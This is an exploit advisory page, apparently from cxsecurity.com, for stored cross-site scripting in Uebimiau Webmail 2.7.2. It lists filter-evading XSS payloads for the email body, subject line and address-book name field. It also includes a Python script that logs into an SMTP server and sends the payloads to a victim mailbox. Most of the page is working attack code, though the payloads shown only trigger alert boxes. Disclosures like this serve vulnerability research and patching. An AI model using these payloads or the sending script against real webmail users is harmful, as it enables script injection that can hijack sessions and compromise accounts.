Uebimiau Webmail stored XSS

2012.08.20
Credit: Shai rod
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#!/usr/bin/python ''' # Exploit Title: Uebimiau Webmail Stored XSS # Date: 17/08/2012 # Exploit Author: Shai rod (@NightRang3r) # Vendor Homepage: http://www.uebimiau.org/ # Software Link: http://www.uebimiau.org/downloads/uebimiau-2.7.2-any.zip # Version: 2.7.2 #Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar About the Application: ====================== Uebimiau is an universal webmail developed in PHP by Aldoir Ventura. It is free and can be installed in any email server. -It runs under any System; -It doesn't require any extra PHP modules; -Doesn't need a database (as MySQL, PostreSQL,etc) -Doesn't need IMAP, but compatible with POP3 and IMAP -Compatible with the MIME Standard (send/receive text/html emails); -Doesn't need cookies; -Easy installation. You only modify one file; -Compatible with Apache, PHP, Sendmail or QMAIL; -Can be easily translated into any language (already translated in 17 languages); -Can use a variety of skins Vulnerability Description ========================= 1. Stored XSS in e-mail body. XSS Payload: <scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script> Send an email to the victim with the payload in the email body, once the user opens the message the XSS should be triggered. 2. Stored XSS in "Title" field ( works when victim opens message in full view). XSS Payload: SubjectGoesHere"><img src='1.jpg'onerror=javascript:alert("XSS")> This one requires you to send at least 2 messages to the victim with the payload in the email subject. Location of injection in page source: <a class="menu" href="readmsg.php?folder=inbox&pag=1&ix=1&sid={4F0FCD8FECD59-4F0FCD8FECD6C-1326435727}&tid=0&lid=5" title="Uebimiau Webmail Stored XSS POC "><img src='1.jpg'onerror=javascript:alert("XSS")>">Next</a> :: <a class="menu" href="javascript:goback()">Back</a> :: 3. Stored XSS in Address Book XSS Payload: <script>alert("XSS")</script> Create a new contact with the XSS Payload in the "Name" field, Save contact, XSS Should be triggered when viewing contacts. ''' import smtplib print "###############################################" print "# Uebimiau Webmail Stored XSS POC #" print "# Coded by: Shai rod #" print "# @NightRang3r #" print "# http://exploit.co.il #" print "# For Educational Purposes Only! #" print "###############################################\r\n" # SETTINGS sender = "attacker@localhost" smtp_login = sender smtp_password = "qwe123" recipient = "victim@localhost" smtp_server = "10.0.0.5" smtp_port = 25 subject = "Uebimiau Webmail Stored XSS POC" xss_payload_1 = """ "><img src='1.jpg'onerror=javascript:alert("XSS")>""" xss_payload_2 = """<scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>""" # SEND E-MAIL print "[*] Sending E-mail to " + recipient + "..." msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n" % (sender, ", ".join(recipient), subject + xss_payload_1) ) msg += "Content-type: text/html\n\n" msg += """Nothing to see here...\r\n""" msg += xss_payload_2 server = smtplib.SMTP(smtp_server, smtp_port) server.ehlo() server.starttls() server.login(smtp_login, smtp_password) print "[*] Sending Message 1\r" server.sendmail(sender, recipient, msg) print "[*] Sending Message 2\r" server.sendmail(sender, recipient, msg) server.quit() print "[+] E-mail sent!"

References:

http://www.uebimiau.org/
http://www.uebimiau.org/downloads/uebimiau-2.7.2-any.zip


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top